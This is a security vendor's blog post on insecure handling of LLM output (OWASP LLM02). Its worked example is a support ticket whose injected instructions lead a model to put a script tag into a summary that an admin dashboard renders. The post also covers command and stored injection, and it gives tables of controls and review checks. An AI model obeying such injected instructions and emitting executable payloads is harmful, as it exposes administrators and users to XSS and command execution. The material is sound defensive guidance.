BlogTechnical

Insecure output handling — the LLM risk teams underrate

Teams spend significant effort hardening the input to an LLM and very little hardening what the LLM outputs. Insecure output handling is how prompt injection becomes code execution, data exfiltration, or stored injection.

Drel Research11 min read

Most LLM security effort concentrates on the input side: filtering user prompts, blocking injection attempts, adding guardrails to the model. The output side receives far less attention. In assessed systems, we consistently find that LLM output reaches HTML renderers, shell commands, database write paths, and downstream APIs without the same validation discipline applied to any other untrusted input.

The result is that prompt injection becomes consequential not because the injection itself causes harm, but because the injected output is then consumed unsafely. Hardening input without hardening output is solving the wrong problem. See also the OWASP LLM Top 10 Assessment for how this risk fits into the broader framework.

What insecure output handling is

Insecure output handling (OWASP LLM02) is the condition where the application consumes LLM-generated text as though it is trusted data. The LLM is not trusted — it is a probabilistic system that can produce any text its training and prompt lead it toward, including text that would be harmful if consumed literally by downstream systems.

The category covers three distinct failure modes, each with its own damage class:

  • Rendering LLM output as HTML — enables cross-site scripting (XSS) if the output contains script tags or event handler attributes.
  • Passing LLM output to shell commands — enables command injection if the output contains shell metacharacters.
  • Storing LLM output in a database without sanitisation — enables stored injection attacks on future consumers of that stored content.

All three share the same root cause: the application trusts the LLM's output the same way it would trust data from its own system, rather than treating it as untrusted input from an external source that must be validated before use.

Output validation — risk and control by output type

Output typeRisk if unvalidatedValidation control
Rendered HTML / markdownXSS if script tags or event-handler attributes are present in outputSanitise through DOMPurify or equivalent before rendering; no dangerouslySetInnerHTML
Code executed in environmentArbitrary code execution if shell metacharacters reach an exec callSandbox execution; allowlist permitted commands; never pass output directly to a shell
SQL / command interpolationSQL injection or command injection if output is interpolated into queriesParameterised queries for all DB writes; argument escaping for all exec paths
Downstream API call payloadUnintended API calls with attacker-controlled parametersSchema-validate output before dispatch; allowlist permitted API targets and methods
User-facing text with financial / legal implicationsIncorrect or fabricated statements presented as authoritativeHuman review gate for high-consequence outputs; disclaimers; scope-limit the model task

How injection becomes execution

The connection between prompt injection and insecure output handling is direct. Prompt injection provides the mechanism to produce adversarial output. Insecure output handling is what makes that adversarial output consequential.

Consider a customer support application that summarises user-submitted tickets and renders those summaries in an admin dashboard as HTML. An attacker submits a support ticket containing injection instructions that cause the LLM to include a script tag in its summary. If the dashboard renders the summary as raw HTML, the script executes in the browser context of every administrator who views the ticket. The XSS payload is delivered through the model, not through a direct input.

The same chain works for command injection. An application that generates shell commands from natural language user requests and executes them — without sanitising the generated command — is exploitable through any injection technique that causes the model to include shell metacharacters in its output.

The LLM is the delivery mechanism. Insecure output handling is what makes delivery matter. A model that produces adversarial output but whose output is always validated before use cannot cause harm through its output channel — regardless of how sophisticated the injection was.

The three failure modes

Each failure mode has distinct characteristics that affect how controls must be applied.

Failure mode 1 — rendering output as HTML

Any application that renders LLM output in a browser context without escaping it is vulnerable to XSS. The attack requires the model to include a script tag, an event handler attribute, or a data URI in its output. Direct injection — where the user types the payload — is an obvious attack path. Indirect injection — where a retrieved document contains the payload and the model reproduces it in its summary — is a more subtle path that many input filters miss.

The damage class of XSS through LLM output is the same as XSS through any other output channel: session hijacking, credential theft, account takeover, malicious redirects. In admin-facing applications, the blast radius is particularly high because the victims are users with elevated privilege.

Failure mode 2 — passing output to shell commands

Applications that use an LLM to generate commands for execution — shell scripts, system calls, CLI tool invocations — and pass those commands directly to a shell or exec function are vulnerable to command injection. The attacker causes the model to include shell metacharacters (; | & $( )) in its output that the executing context interprets as command separators or substitutions.

This failure mode is more common in agentic systems, where the model's tool manifest includes shell execution capabilities, than in chat applications. But it also appears in developer tools, code generation assistants, and data pipeline automation that use LLMs to construct command strings from natural language.

Failure mode 3 — storing output without sanitisation

When LLM output is stored in a database without sanitisation and later retrieved and rendered, the stored content becomes a vector for future attacks on users who access that stored data. This is the stored injection equivalent of the HTML rendering failure mode, with the additional property that the attack persists across sessions and affects users who had no interaction with the original injection.

Knowledge bases that ingest LLM-generated content, helpdesk systems that store LLM-written responses, and document management systems with AI-assisted drafting are all potentially affected by this failure mode.

The downstream trust problem

Insecure output handling is a manifestation of a broader problem: the assumption that because the model is a trusted component of the system, its output is trusted data. This assumption is incorrect.

The LLM is trusted in the sense that the operator controls which model is used. But the model's output is determined by its training and its input — and the input includes content from untrusted sources: user messages, retrieved documents, tool responses. If any of those sources is adversarially controlled, the model's output may be adversarially controlled regardless of how trusted the model itself is.

The correct mental model is: LLM output is produced by a trusted process consuming untrusted inputs. Its trust level is therefore bounded by its inputs. Any downstream system that consumes the output must treat it as untrusted data whose trust level cannot be higher than the least-trusted input the model received.

Controls at each layer

Controls for insecure output handling operate at three layers: the rendering layer, the execution layer, and the storage layer. Controls at each layer are independent — a control at the rendering layer does not protect the execution layer.

LayerControlEvidence
HTML renderingLLM output passed through a sanitisation library (e.g. DOMPurify) before rendering; no dangerouslySetInnerHTML with unsanitised output; markdown-to-HTML libraries configured to strip scriptsCode review of all render paths for LLM output; XSS test with script tag in output
Shell executionCommands generated by the model are not passed directly to shell exec; arguments are validated and escaped before use; sandbox or allowlist restricts what commands are permittedCode review of all exec paths; command injection test with shell metacharacters in output
Database storageLLM output stored using parameterised queries; sanitisation applied before storage in columns used for HTML rendering; stored content treated as untrusted when retrievedParameterised query usage confirmed; stored injection test: output with XSS payload stored and retrieved does not execute
API callsLLM-generated content used as API request bodies or parameters is schema-validated before dispatch; external API calls from LLM output require explicit allowlistingSchema validation implementation; allowlist configuration and enforcement test

What a review must verify

A security review that addresses insecure output handling must map every path where LLM output is consumed by the application and verify that each path treats the output as untrusted data. The review must produce:

  • A map of output consumption points: which components receive LLM output and in what form.
  • For HTML rendering paths: evidence that sanitisation is applied before output reaches any HTML render context.
  • For shell execution paths: evidence that output is not passed directly to a shell exec function; argument validation is in place.
  • For database storage paths: evidence that parameterised queries are used and that stored LLM content is treated as untrusted on retrieval.
  • Test results covering each failure mode: XSS attempt, command injection attempt, stored injection attempt.

The OWASP LLM Top 10 Assessment structures this review against all ten OWASP risks and produces an evidence pack suitable for AI Committee review.

Blog

Get new posts in your inbox

AI security review, OWASP Agentic Top 10, ISO 42001 evidence, and what AI Committees actually need. No cadence promises — we publish when there's something worth reading.

Review your LLM output handling

Drel maps the output consumption paths in assessed systems, identifies insecure handling at each layer, and produces evidence that the AI Committee needs to make a clearance decision.

A note on scope: Drel reviews assessed systems against documented architecture, configuration and intent. It does not ingest live telemetry from production environments. Dispositions reflect the assessed system at the time of review and the re-assessment triggers that govern when the disposition must be revisited.